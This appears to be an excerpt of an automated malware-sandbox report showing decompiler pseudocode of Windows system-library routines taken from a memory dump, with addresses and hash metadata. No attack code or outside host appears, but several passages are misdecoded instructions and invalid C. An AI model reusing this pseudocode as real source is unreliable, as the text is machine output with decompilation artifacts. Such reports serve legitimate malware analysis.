                                                                              													_t219 = 0;
                                                                              												}
                                                                              											}
                                                                              											goto L36;
                                                                              										} else {
                                                                              											__eax = _v44;
                                                                              											__ebx = __ebx + __eax * 2;
                                                                              											__ebx = __ebx + 2;
                                                                              											__eflags = __ebx;
                                                                              											L13:
                                                                              											_t291 = _v36;
                                                                              											goto L14;
                                                                              										}
                                                                              									}
                                                                              								} else {
                                                                              									__eax = _v44;
                                                                              									__ecx =  *0x1827b9c; // 0x0
                                                                              									_v44 + _v44 =  *[fs:0x30];
                                                                              									__ecx = __ecx + 0x180000;
                                                                              									__eax = L01754620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                                              									_v72 = __eax;
                                                                              									__eflags = __eax;
                                                                              									if(__eax == 0) {
                                                                              										__eax = E0174EB70(__ecx, 0x18279a0);
                                                                              										__eax = _v52;
                                                                              										L36:
                                                                              										_pop(_t323);
                                                                              										_pop(_t331);
                                                                              										__eflags = _v8 ^ _t336;
                                                                              										_pop(_t282);
                                                                              										return E0177B640(_t219, _t282, _v8 ^ _t336, _t311, _t323, _t331);
                                                                              									} else {
                                                                              										__ecx =  &_v44;
                                                                              										_push(__ecx);
                                                                              										_push(_v44);
                                                                              										_push(__eax);
                                                                              										_push(4);
                                                                              										_push(L"PATH");
                                                                              										_push(0);
                                                                              										L75();
                                                                              										__esi = __eax;
                                                                              										_v68 = __eax;
                                                                              										goto L10;
                                                                              									}
                                                                              								}
                                                                              								goto L126;
                                                                              							case 4:
                                                                              								__ebx = __ebx + 4;
                                                                              								goto L14;
                                                                              							case 5:
                                                                              								_t277 = _v56;
                                                                              								if(_v56 != 0) {
                                                                              									_t311 =  &_v36;
                                                                              									_t279 = E01762E3E(_t277,  &_v36);
                                                                              									_t291 = _v36;
                                                                              									_v76 = _t279;
                                                                              								}
                                                                              								if(_t291 == 0) {
                                                                              									goto L44;
                                                                              								} else {
                                                                              									_t281 = _t281 + 2 + _t291;
                                                                              								}
                                                                              								goto L14;
                                                                              							case 6:
                                                                              								__eax =  *0x1825764 & 0x0000ffff;
                                                                              								goto L53;
                                                                              							case 7:
                                                                              								__eax =  *0x1828478 & 0x0000ffff;
                                                                              								__ebx = __ebx + __eax;
                                                                              								__eflags = _a8;
                                                                              								if(_a8 != 0) {
                                                                              									__ebx = __ebx + 0x16;
                                                                              									__ebx = __ebx + __eax;
                                                                              								}
                                                                              								__eflags = __dl;
                                                                              								if(__eflags != 0) {
                                                                              									__eax = 0x1828478;
                                                                              									L98:
                                                                              									_v32 = __eax;
                                                                              								}
                                                                              								goto L14;
                                                                              							case 8:
                                                                              								__eax =  *0x1826e58 & 0x0000ffff;
                                                                              								__eax = ( *0x1826e58 & 0x0000ffff) + 2;
                                                                              								L53:
                                                                              								__ebx = __ebx + __eax;
                                                                              								L14:
                                                                              								_t322 = _t322 + 1;
                                                                              								if(_t322 >= _v48) {
                                                                              									goto L16;
                                                                              								} else {
                                                                              									_t311 = _v37;
                                                                              									goto L1;
                                                                              								}
                                                                              								goto L126;
                                                                              						}
                                                                              					}
                                                                              					L56:
                                                                              					_push(0x25);
                                                                              					asm("int 0x29");
                                                                              					asm("out 0x28, al");
                                                                              					if(__eflags > 0) {
                                                                              						asm("o16 sub [esi+0x1], dh");
                                                                              					}
                                                                              					_t105 = _t329 + 1;
                                                                              					 *_t105 =  *(_t329 + 1) - _t311;
                                                                              					__eflags =  *_t105;
                                                                              					asm("loopne 0x29");
                                                                              					if(__eflags > 0) {
                                                                              						if (__eflags <= 0) goto L62;
                                                                              					}
                                                                              					if(__eflags > 0) {
                                                                              						_t329 = _t329 + 1;
                                                                              						__eflags = _t329;
                                                                              					}
                                                                              					 *(_t329 + 1) =  *(_t329 + 1) - _t311;
                                                                              					_t245 = _t244 + 0x1f017626;
                                                                              					__eflags = _t245;
                                                                              					if(_t245 == 0) {
                                                                              						_t245 = _t340;
                                                                              					}
                                                                              					 *(_t329 + 1) =  *(_t329 + 1) - _t311;
                                                                              					_t246 = _t245 ^ 0x02017a5b;
                                                                              					 *(_t329 + 1) =  *(_t329 + 1) - _t329;
                                                                              					 *_t246 =  *_t246 - 0x76;
                                                                              					_t332 = _t329 + _t329;
                                                                              					__eflags = _t332;
                                                                              					asm("daa");
                                                                              					if(_t332 > 0) {
                                                                              						_push(ds);
                                                                              					}
                                                                              					 *((intOrPtr*)(_t332 + 1)) =  *((intOrPtr*)(_t332 + 1)) - _t311;
                                                                              					_t333 = _t332 - 1;
                                                                              					_t116 = _t333 + 1;
                                                                              					 *_t116 =  *(_t333 + 1) - _t311;
                                                                              					__eflags =  *_t116;
                                                                              					asm("daa");
                                                                              					if(__eflags > 0) {
                                                                              						asm("fcomp dword [ebx+0x7a]");
                                                                              					}
                                                                              					if(__eflags == 0) {
                                                                              						_t246 = 0x28;
                                                                              					}
                                                                              					_t118 = _t333 + 1;
                                                                              					 *_t118 =  *(_t333 + 1) - _t311;
                                                                              					__eflags =  *_t118;
                                                                              				}
                                                                              				L126:
                                                                              			}








































                                                                              0x017a5b35
                                                                              0x017a5b3c
                                                                              0x017628fb
                                                                              0x017628fb
                                                                              0x017626cc
                                                                              0x017626cc
                                                                              0x017626d0
                                                                              0x00000000
                                                                              0x017626d2
                                                                              0x017626d2
                                                                              0x00000000
                                                                              0x017626d2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017625fe
                                                                              0x0176292d
                                                                              0x0176292d
                                                                              0x01762930
                                                                              0x01762935
                                                                              0x01762937
                                                                              0x01762939
                                                                              0x01762939
                                                                              0x0176293a
                                                                              0x0176293a
                                                                              0x0176293a
                                                                              0x0176293d
                                                                              0x0176293f
                                                                              0x01762941
                                                                              0x01762941
                                                                              0x01762942
                                                                              0x01762945
                                                                              0x01762945
                                                                              0x01762945
                                                                              0x01762946
                                                                              0x01762949
                                                                              0x01762949
                                                                              0x0176294f
                                                                              0x01762951
                                                                              0x01762951
                                                                              0x01762952
                                                                              0x01762955
                                                                              0x0176295a
                                                                              0x0176295d
                                                                              0x01762960
                                                                              0x01762960
                                                                              0x01762962
                                                                              0x01762963
                                                                              0x01762965
                                                                              0x01762965
                                                                              0x01762966
                                                                              0x01762969
                                                                              0x0176296a
                                                                              0x0176296a
                                                                              0x0176296a
                                                                              0x0176296e
                                                                              0x0176296f
                                                                              0x01762971
                                                                              0x01762971
                                                                              0x01762973
                                                                              0x01762975
                                                                              0x01762975
                                                                              0x01762976
                                                                              0x01762976
                                                                              0x01762976
                                                                              0x01762976
                                                                              0x00000000

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: PATH
                                                                              • API String ID: 0-1036084923
                                                                              • Opcode ID: d160cdb94162fe9098f82d0b14f3e7f858d077709b5b466ca28b19c602d4ca8b
                                                                              • Instruction ID: 03d357e5aa6c5c6402f02df7a2fcf14a97e0051d8816305002376e01b5852c9b
                                                                              • Opcode Fuzzy Hash: d160cdb94162fe9098f82d0b14f3e7f858d077709b5b466ca28b19c602d4ca8b
                                                                              • Instruction Fuzzy Hash: 89C1AE71E00219DBDB65DFA9D880BADFBB9FF48700F448029EA01BB255D738A941CF60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 80%
                                                                              			E0176FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                                              				char _v5;
                                                                              				signed int _v8;
                                                                              				signed int _v12;
                                                                              				char _v16;
                                                                              				char _v17;
                                                                              				char _v20;
                                                                              				signed int _v24;
                                                                              				char _v28;
                                                                              				char _v32;
                                                                              				signed int _v40;
                                                                              				void* __ecx;
                                                                              				void* __edi;
                                                                              				void* __ebp;
                                                                              				signed int _t73;
                                                                              				intOrPtr* _t75;
                                                                              				signed int _t77;
                                                                              				signed int _t79;
                                                                              				signed int _t81;
                                                                              				intOrPtr _t83;
                                                                              				intOrPtr _t85;
                                                                              				intOrPtr _t86;
                                                                              				signed int _t91;
                                                                              				signed int _t94;
                                                                              				signed int _t95;
                                                                              				signed int _t96;
                                                                              				signed int _t106;
                                                                              				signed int _t108;
                                                                              				signed int _t114;
                                                                              				signed int _t116;
                                                                              				signed int _t118;
                                                                              				signed int _t122;
                                                                              				signed int _t123;
                                                                              				void* _t129;
                                                                              				signed int _t130;
                                                                              				void* _t132;
                                                                              				intOrPtr* _t134;
                                                                              				signed int _t138;
                                                                              				signed int _t141;
                                                                              				signed int _t147;
                                                                              				intOrPtr _t153;
                                                                              				signed int _t154;
                                                                              				signed int _t155;
                                                                              				signed int _t170;
                                                                              				void* _t174;
                                                                              				signed int _t176;
                                                                              				signed int _t177;
                                                                              
                                                                              				_t129 = __ebx;
                                                                              				_push(_t132);
                                                                              				_push(__esi);
                                                                              				_t174 = _t132;
                                                                              				_t73 =  !( *( *(_t174 + 0x18)));
                                                                              				if(_t73 >= 0) {
                                                                              					L5:
                                                                              					return _t73;
                                                                              				} else {
                                                                              					E0174EEF0(0x1827b60);
                                                                              					_t134 =  *0x1827b84; // 0x77f07b80
                                                                              					_t2 = _t174 + 0x24; // 0x24
                                                                              					_t75 = _t2;
                                                                              					if( *_t134 != 0x1827b80) {
                                                                              						_push(3);
                                                                              						asm("int 0x29");
                                                                              						asm("int3");
                                                                              						asm("int3");
                                                                              						asm("int3");
                                                                              						asm("int3");
                                                                              						asm("int3");
                                                                              						asm("int3");
                                                                              						asm("int3");
                                                                              						asm("int3");
                                                                              						asm("int3");
                                                                              						asm("int3");
                                                                              						asm("int3");
                                                                              						asm("int3");
                                                                              						asm("int3");
                                                                              						asm("int3");
                                                                              						asm("int3");
                                                                              						asm("int3");
                                                                              						asm("int3");
                                                                              						asm("int3");
                                                                              						asm("int3");
                                                                              						_push(0x1827b60);
                                                                              						_t170 = _v8;
                                                                              						_v28 = 0;
                                                                              						_v40 = 0;
                                                                              						_v24 = 0;
                                                                              						_v17 = 0;
                                                                              						_v32 = 0;
                                                                              						__eflags = _t170 & 0xffff7cf2;
                                                                              						if((_t170 & 0xffff7cf2) != 0) {
                                                                              							L43:
                                                                              							_t77 = 0xc000000d;
                                                                              						} else {
                                                                              							_t79 = _t170 & 0x0000000c;
                                                                              							__eflags = _t79;
                                                                              							if(_t79 != 0) {
                                                                              								__eflags = _t79 - 0xc;
                                                                              								if(_t79 == 0xc) {
                                                                              									goto L43;
                                                                              								} else {
                                                                              									goto L9;
                                                                              								}
                                                                              							} else {
                                                                              								_t170 = _t170 | 0x00000008;
                                                                              								__eflags = _t170;
                                                                              								L9:
                                                                              								_t81 = _t170 & 0x00000300;
                                                                              								__eflags = _t81 - 0x300;
                                                                              								if(_t81 == 0x300) {
                                                                              									goto L43;
                                                                              								} else {
                                                                              									_t138 = _t170 & 0x00000001;
                                                                              									__eflags = _t138;
                                                                              									_v24 = _t138;
                                                                              									if(_t138 != 0) {
                                                                              										__eflags = _t81;
                                                                              										if(_t81 != 0) {
                                                                              											goto L43;
                                                                              										} else {
                                                                              											goto L11;
                                                                              										}
                                                                              									} else {
                                                                              										L11:
                                                                              										_push(_t129);
                                                                              										_t77 = E01746D90( &_v20);
                                                                              										_t130 = _t77;
                                                                              										__eflags = _t130;
                                                                              										if(_t130 >= 0) {
                                                                              											_push(_t174);
                                                                              											__eflags = _t170 & 0x00000301;
                                                                              											if((_t170 & 0x00000301) == 0) {
                                                                              												_t176 = _a8;
                                                                              												__eflags = _t176;
                                                                              												if(__eflags == 0) {
                                                                              													L64:
                                                                              													_t83 =  *[fs:0x18];
                                                                              													_t177 = 0;
                                                                              													__eflags =  *(_t83 + 0xfb8);
                                                                              													if( *(_t83 + 0xfb8) != 0) {
                                                                              														E017476E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                                              														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                                              													}
                                                                              													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                                              													goto L15;
                                                                              												} else {
                                                                              													asm("sbb edx, edx");
                                                                              													_t114 = E017D8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                                              													__eflags = _t114;
                                                                              													if(_t114 < 0) {
                                                                              														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                                              														E0173B150();
                                                                              													}
                                                                              													_t116 = E017D6D81(_t176,  &_v16);
                                                                              													__eflags = _t116;
                                                                              													if(_t116 >= 0) {
                                                                              														__eflags = _v16 - 2;
                                                                              														if(_v16 < 2) {
                                                                              															L56:
                                                                              															_t118 = E017475CE(_v20, 5, 0);
                                                                              															__eflags = _t118;
                                                                              															if(_t118 < 0) {
                                                                              																L67:
                                                                              																_t130 = 0xc0000017;
                                                                              																goto L32;
                                                                              															} else {
                                                                              																__eflags = _v12;
                                                                              																if(_v12 == 0) {
                                                                              																	goto L67;
                                                                              																} else {
                                                                              																	_t153 =  *0x1828638; // 0x0
                                                                              																	_t122 = L017438A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                                              																	_t154 = _v12;
                                                                              																	_t130 = _t122;
                                                                              																	__eflags = _t130;
                                                                              																	if(_t130 >= 0) {
                                                                              																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                                              																		__eflags = _t123;
                                                                              																		if(_t123 != 0) {
                                                                              																			_t155 = _a12;
                                                                              																			__eflags = _t155;
                                                                              																			if(_t155 != 0) {
                                                                              																				 *_t155 = _t123;
                                                                              																			}
                                                                              																			goto L64;
                                                                              																		} else {
                                                                              																			E017476E2(_t154);
                                                                              																			goto L41;
                                                                              																		}
                                                                              																	} else {
                                                                              																		E017476E2(_t154);
                                                                              																		_t177 = 0;
                                                                              																		goto L18;
                                                                              																	}
                                                                              																}
                                                                              															}
                                                                              														} else {
                                                                              															__eflags =  *_t176;
                                                                              															if( *_t176 != 0) {
                                                                              																goto L56;
                                                                              															} else {
                                                                              																__eflags =  *(_t176 + 2);
                                                                              																if( *(_t176 + 2) == 0) {
                                                                              																	goto L64;
                                                                              																} else {
                                                                              																	goto L56;
                                                                              																}
                                                                              															}
                                                                              														}
                                                                              													} else {
                                                                              														_t130 = 0xc000000d;
                                                                              														goto L32;
                                                                              													}
                                                                              												}
                                                                              												goto L35;
                                                                              											} else {
                                                                              												__eflags = _a8;
                                                                              												if(_a8 != 0) {
                                                                              													_t77 = 0xc000000d;
                                                                              												} else {
                                                                              													_v5 = 1;
                                                                              													L0176FCE3(_v20, _t170);
                                                                              													_t177 = 0;
                                                                              													__eflags = 0;
                                                                              													L15:
                                                                              													_t85 =  *[fs:0x18];
                                                                              													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                                              													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                                              														L18:
                                                                              														__eflags = _t130;
                                                                              														if(_t130 != 0) {
                                                                              															goto L32;
                                                                              														} else {
                                                                              															__eflags = _v5 - _t130;
                                                                              															if(_v5 == _t130) {
                                                                              																goto L32;
                                                                              															} else {
                                                                              																_t86 =  *[fs:0x18];
                                                                              																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                                              																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                                              																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                                              																}
                                                                              																__eflags = _t177;
                                                                              																if(_t177 == 0) {
                                                                              																	L31:
                                                                              																	__eflags = 0;
                                                                              																	L017470F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                                              																	goto L32;
                                                                              																} else {
                                                                              																	__eflags = _v24;
                                                                              																	_t91 =  *(_t177 + 0x20);
                                                                              																	if(_v24 != 0) {
                                                                              																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                                              																		goto L31;
                                                                              																	} else {
                                                                              																		_t141 = _t91 & 0x00000040;
                                                                              																		__eflags = _t170 & 0x00000100;
                                                                              																		if((_t170 & 0x00000100) == 0) {
                                                                              																			__eflags = _t141;
                                                                              																			if(_t141 == 0) {
                                                                              																				L74:
                                                                              																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                                              																				goto L27;
                                                                              																			} else {
                                                                              																				_t177 = E0176FD22(_t177);
                                                                              																				__eflags = _t177;
                                                                              																				if(_t177 == 0) {
                                                                              																					goto L42;
                                                                              																				} else {
                                                                              																					_t130 = E0176FD9B(_t177, 0, 4);
                                                                              																					__eflags = _t130;
                                                                              																					if(_t130 != 0) {
                                                                              																						goto L42;
                                                                              																					} else {
                                                                              																						_t68 = _t177 + 0x20;
                                                                              																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                                              																						__eflags =  *_t68;
                                                                              																						_t91 =  *(_t177 + 0x20);
                                                                              																						goto L74;
                                                                              																					}
                                                                              																				}
                                                                              																			}
                                                                              																			goto L35;
                                                                              																		} else {
                                                                              																			__eflags = _t141;
                                                                              																			if(_t141 != 0) {
                                                                              																				_t177 = E0176FD22(_t177);
                                                                              																				__eflags = _t177;
                                                                              																				if(_t177 == 0) {
                                                                              																					L42:
                                                                              																					_t77 = 0xc0000001;
                                                                              																					goto L33;
                                                                              																				} else {
                                                                              																					_t130 = E0176FD9B(_t177, 0, 4);
                                                                              																					__eflags = _t130;
                                                                              																					if(_t130 != 0) {
                                                                              																						goto L42;
                                                                              																					} else {
                                                                              																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                                              																						_t91 =  *(_t177 + 0x20);
                                                                              																						goto L26;
                                                                              																					}
                                                                              																				}
                                                                              																				goto L35;
                                                                              																			} else {
                                                                              																				L26:
                                                                              																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                                              																				__eflags = _t94;
                                                                              																				L27:
                                                                              																				 *(_t177 + 0x20) = _t94;
                                                                              																				__eflags = _t170 & 0x00008000;
                                                                              																				if((_t170 & 0x00008000) != 0) {
                                                                              																					_t95 = _a12;
                                                                              																					__eflags = _t95;
                                                                              																					if(_t95 != 0) {
                                                                              																						_t96 =  *_t95;
                                                                              																						__eflags = _t96;
                                                                              																						if(_t96 != 0) {
                                                                              																							 *((short*)(_t177 + 0x22)) = 0;
                                                                              																							_t40 = _t177 + 0x20;
                                                                              																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                                              																							__eflags =  *_t40;
                                                                              																						}
                                                                              																					}
                                                                              																				}
                                                                              																				goto L31;
                                                                              																			}
                                                                              																		}
                                                                              																	}
                                                                              																}
                                                                              															}
                                                                              														}
                                                                              													} else {
                                                                              														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                                              														_t106 =  *(_t147 + 0x20);
                                                                              														__eflags = _t106 & 0x00000040;
                                                                              														if((_t106 & 0x00000040) != 0) {
                                                                              															_t147 = E0176FD22(_t147);
                                                                              															__eflags = _t147;
                                                                              															if(_t147 == 0) {
                                                                              																L41:
                                                                              																_t130 = 0xc0000001;
                                                                              																L32:
                                                                              																_t77 = _t130;
                                                                              																goto L33;
                                                                              															} else {
                                                                              																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                                              																_t106 =  *(_t147 + 0x20);
                                                                              																goto L17;
                                                                              															}
                                                                              															goto L35;
                                                                              														} else {
                                                                              															L17:
                                                                              															_t108 = _t106 | 0x00000080;
                                                                              															__eflags = _t108;
                                                                              															 *(_t147 + 0x20) = _t108;
                                                                              															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                                              															goto L18;
                                                                              														}
                                                                              													}
                                                                              												}
                                                                              											}
                                                                              											L33:
                                                                              										}
                                                                              									}
                                                                              								}
                                                                              							}
                                                                              						}
                                                                              						L35:
                                                                              						return _t77;
                                                                              					} else {
                                                                              						 *_t75 = 0x1827b80;
                                                                              						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                                              						 *_t134 = _t75;
                                                                              						 *0x1827b84 = _t75;
                                                                              						_t73 = E0174EB70(_t134, 0x1827b60);
                                                                              						if( *0x1827b20 != 0) {
                                                                              							_t73 =  *( *[fs:0x30] + 0xc);
                                                                              							if( *((char*)(_t73 + 0x28)) == 0) {
                                                                              								_t73 = E0174FF60( *0x1827b20);
                                                                              							}
                                                                              						}
                                                                              						goto L5;
                                                                              					}
                                                                              				}
                                                                              			}

















































                                                                              0x0176fba7
                                                                              0x0176fbab
                                                                              0x017abf02
                                                                              0x0176fbb1
                                                                              0x0176fbb1
                                                                              0x0176fbb8
                                                                              0x0176fbbd
                                                                              0x0176fbbd
                                                                              0x0176fbbf
                                                                              0x0176fbbf
                                                                              0x0176fbc5
                                                                              0x0176fbcb
                                                                              0x0176fbf8
                                                                              0x0176fbf8
                                                                              0x0176fbfa
                                                                              0x00000000
                                                                              0x0176fc00
                                                                              0x0176fc00
                                                                              0x0176fc03
                                                                              0x00000000
                                                                              0x0176fc09
                                                                              0x0176fc09
                                                                              0x0176fc0f
                                                                              0x0176fc15
                                                                              0x0176fc23
                                                                              0x0176fc23
                                                                              0x0176fc25
                                                                              0x0176fc27
                                                                              0x0176fc75
                                                                              0x0176fc7c
                                                                              0x0176fc84
                                                                              0x00000000
                                                                              0x0176fc29
                                                                              0x0176fc29
                                                                              0x0176fc2d
                                                                              0x0176fc30
                                                                              0x017abf0f
                                                                              0x00000000
                                                                              0x0176fc36
                                                                              0x0176fc38
                                                                              0x0176fc3b
                                                                              0x0176fc41
                                                                              0x017abf17
                                                                              0x017abf19
                                                                              0x017abf48
                                                                              0x017abf4b
                                                                              0x00000000
                                                                              0x017abf1b
                                                                              0x017abf22
                                                                              0x017abf24
                                                                              0x017abf26
                                                                              0x00000000
                                                                              0x017abf2c
                                                                              0x017abf37
                                                                              0x017abf39
                                                                              0x017abf3b
                                                                              0x00000000
                                                                              0x017abf41
                                                                              0x017abf41
                                                                              0x017abf41
                                                                              0x017abf41
                                                                              0x017abf45
                                                                              0x00000000
                                                                              0x017abf45
                                                                              0x017abf3b
                                                                              0x017abf26
                                                                              0x00000000
                                                                              0x0176fc47
                                                                              0x0176fc47
                                                                              0x0176fc49
                                                                              0x0176fcb2
                                                                              0x0176fcb4
                                                                              0x0176fcb6
                                                                              0x0176fcdc
                                                                              0x0176fcdc
                                                                              0x00000000
                                                                              0x0176fcb8
                                                                              0x0176fcc3
                                                                              0x0176fcc5
                                                                              0x0176fcc7
                                                                              0x00000000
                                                                              0x0176fcc9
                                                                              0x0176fcc9
                                                                              0x0176fccd
                                                                              0x00000000
                                                                              0x0176fccd
                                                                              0x0176fcc7
                                                                              0x00000000
                                                                              0x0176fc4b
                                                                              0x0176fc4b
                                                                              0x0176fc4e
                                                                              0x0176fc4e
                                                                              0x0176fc51
                                                                              0x0176fc51
                                                                              0x0176fc54
                                                                              0x0176fc5a
                                                                              0x0176fc5c
                                                                              0x0176fc5f
                                                                              0x0176fc61
                                                                              0x0176fc63
                                                                              0x0176fc65
                                                                              0x0176fc67
                                                                              0x0176fc6e
                                                                              0x0176fc72
                                                                              0x0176fc72
                                                                              0x0176fc72
                                                                              0x0176fc72
                                                                              0x0176fc67
                                                                              0x0176fc61
                                                                              0x00000000
                                                                              0x0176fc5a
                                                                              0x0176fc49
                                                                              0x0176fc41
                                                                              0x0176fc30
                                                                              0x0176fc27
                                                                              0x0176fc03
                                                                              0x0176fbcd
                                                                              0x0176fbd3
                                                                              0x0176fbd9
                                                                              0x0176fbdc
                                                                              0x0176fbde
                                                                              0x0176fc99
                                                                              0x0176fc9b
                                                                              0x0176fc9d
                                                                              0x0176fcd5
                                                                              0x0176fcd5
                                                                              0x0176fc89
                                                                              0x0176fc89
                                                                              0x00000000
                                                                              0x0176fc9f
                                                                              0x0176fc9f
                                                                              0x0176fca3
                                                                              0x00000000
                                                                              0x0176fca3
                                                                              0x00000000
                                                                              0x0176fbe4
                                                                              0x0176fbe4
                                                                              0x0176fbe4
                                                                              0x0176fbe4
                                                                              0x0176fbe9
                                                                              0x0176fbf2
                                                                              0x00000000
                                                                              0x0176fbf2
                                                                              0x0176fbde
                                                                              0x0176fbcb
                                                                              0x0176fbab
                                                                              0x0176fc8b
                                                                              0x0176fc8b
                                                                              0x0176fc8c
                                                                              0x0176fb80
                                                                              0x0176fb72
                                                                              0x0176fb5e
                                                                              0x0176fc8d
                                                                              0x0176fc91
                                                                              0x0176fadf
                                                                              0x0176fadf
                                                                              0x0176fae1
                                                                              0x0176fae4
                                                                              0x0176fae7
                                                                              0x0176faec
                                                                              0x0176faf8
                                                                              0x0176fb00
                                                                              0x0176fb07
                                                                              0x0176fb0f
                                                                              0x0176fb0f
                                                                              0x0176fb07
                                                                              0x00000000
                                                                              0x0176faf8
                                                                              0x0176fadd

                                                                              Strings
                                                                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 017ABE0F
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                              • API String ID: 0-865735534
                                                                              • Opcode ID: c11657752c114a0b271c0315cef9e618cdb63a57bf0ab4599f311e5f69620604
                                                                              • Instruction ID: d3b6a75d3459f13d9bc8c6a78d1975422957f03960541ff1a06fca7650bc54d9
                                                                              • Opcode Fuzzy Hash: c11657752c114a0b271c0315cef9e618cdb63a57bf0ab4599f311e5f69620604
                                                                              • Instruction Fuzzy Hash: 76A12731B006068BEB26CF6DD46477AF7A9BF88710F04466AEE16CB685DB30D841CB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 63%
                                                                              			E01732D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                                              				signed char _v8;
                                                                              				signed int _v12;
                                                                              				signed int _v16;
                                                                              				signed int _v20;
                                                                              				signed int _v24;
                                                                              				intOrPtr _v28;
                                                                              				intOrPtr _v32;
                                                                              				signed int _v52;
                                                                              				void* __esi;
                                                                              				void* __ebp;
                                                                              				intOrPtr _t55;
                                                                              				signed int _t57;
                                                                              				signed int _t58;
                                                                              				char* _t62;
                                                                              				signed char* _t63;
                                                                              				signed char* _t64;
                                                                              				signed int _t67;
                                                                              				signed int _t72;
                                                                              				signed int _t77;
                                                                              				signed int _t78;
                                                                              				signed int _t88;
                                                                              				intOrPtr _t89;
                                                                              				signed char _t93;
                                                                              				signed int _t97;
                                                                              				signed int _t98;
                                                                              				signed int _t102;
                                                                              				signed int _t103;
                                                                              				intOrPtr _t104;
                                                                              				signed int _t105;
                                                                              				signed int _t106;
                                                                              				signed char _t109;
                                                                              				signed int _t111;
                                                                              				void* _t116;
                                                                              
                                                                              				_t102 = __edi;
                                                                              				_t97 = __edx;
                                                                              				_v12 = _v12 & 0x00000000;
                                                                              				_t55 =  *[fs:0x18];
                                                                              				_t109 = __ecx;
                                                                              				_v8 = __edx;
                                                                              				_t86 = 0;
                                                                              				_v32 = _t55;
                                                                              				_v24 = 0;
                                                                              				_push(__edi);
                                                                              				if(__ecx == 0x1825350) {
                                                                              					_t86 = 1;
                                                                              					_v24 = 1;
                                                                              					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                                              				}
                                                                              				_t103 = _t102 | 0xffffffff;
                                                                              				if( *0x1827bc8 != 0) {
                                                                              					_push(0xc000004b);
                                                                              					_push(_t103);
                                                                              					E017797C0();
                                                                              				}
                                                                              				if( *0x18279c4 != 0) {
                                                                              					_t57 = 0;
                                                                              				} else {
                                                                              					_t57 = 0x18279c8;
                                                                              				}
                                                                              				_v16 = _t57;
                                                                              				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                                              					_t93 = _t109;
                                                                              					L23();
                                                                              				}
                                                                              				_t58 =  *_t109;
                                                                              				if(_t58 == _t103) {
                                                                              					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                                              					_t58 = _t103;
                                                                              					if(__eflags == 0) {
                                                                              						_t93 = _t109;
                                                                              						E01761624(_t86, __eflags);
                                                                              						_t58 =  *_t109;
                                                                              					}
                                                                              				}
                                                                              				_v20 = _v20 & 0x00000000;
                                                                              				if(_t58 != _t103) {
                                                                              					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                                              				}
                                                                              				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                                              				_t88 = _v16;
                                                                              				_v28 = _t104;
                                                                              				L9:
                                                                              				while(1) {
                                                                              					if(E01757D50() != 0) {
                                                                              						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                                              					} else {
                                                                              						_t62 = 0x7ffe0382;
                                                                              					}
                                                                              					if( *_t62 != 0) {
                                                                              						_t63 =  *[fs:0x30];
                                                                              						__eflags = _t63[0x240] & 0x00000002;
                                                                              						if((_t63[0x240] & 0x00000002) != 0) {
                                                                              							_t93 = _t109;
                                                                              							E017CFE87(_t93);
                                                                              						}
                                                                              					}
                                                                              					if(_t104 != 0xffffffff) {
                                                                              						_push(_t88);
                                                                              						_push(0);
                                                                              						_push(_t104);
                                                                              						_t64 = E01779520();
                                                                              						goto L15;
                                                                              					} else {
                                                                              						while(1) {
                                                                              							_t97 =  &_v8;
                                                                              							_t64 = E0176E18B(_t109 + 4, _t97, 4, _t88, 0);
                                                                              							if(_t64 == 0x102) {
                                                                              								break;
                                                                              							}
                                                                              							_t93 =  *(_t109 + 4);
                                                                              							_v8 = _t93;
                                                                              							if((_t93 & 0x00000002) != 0) {
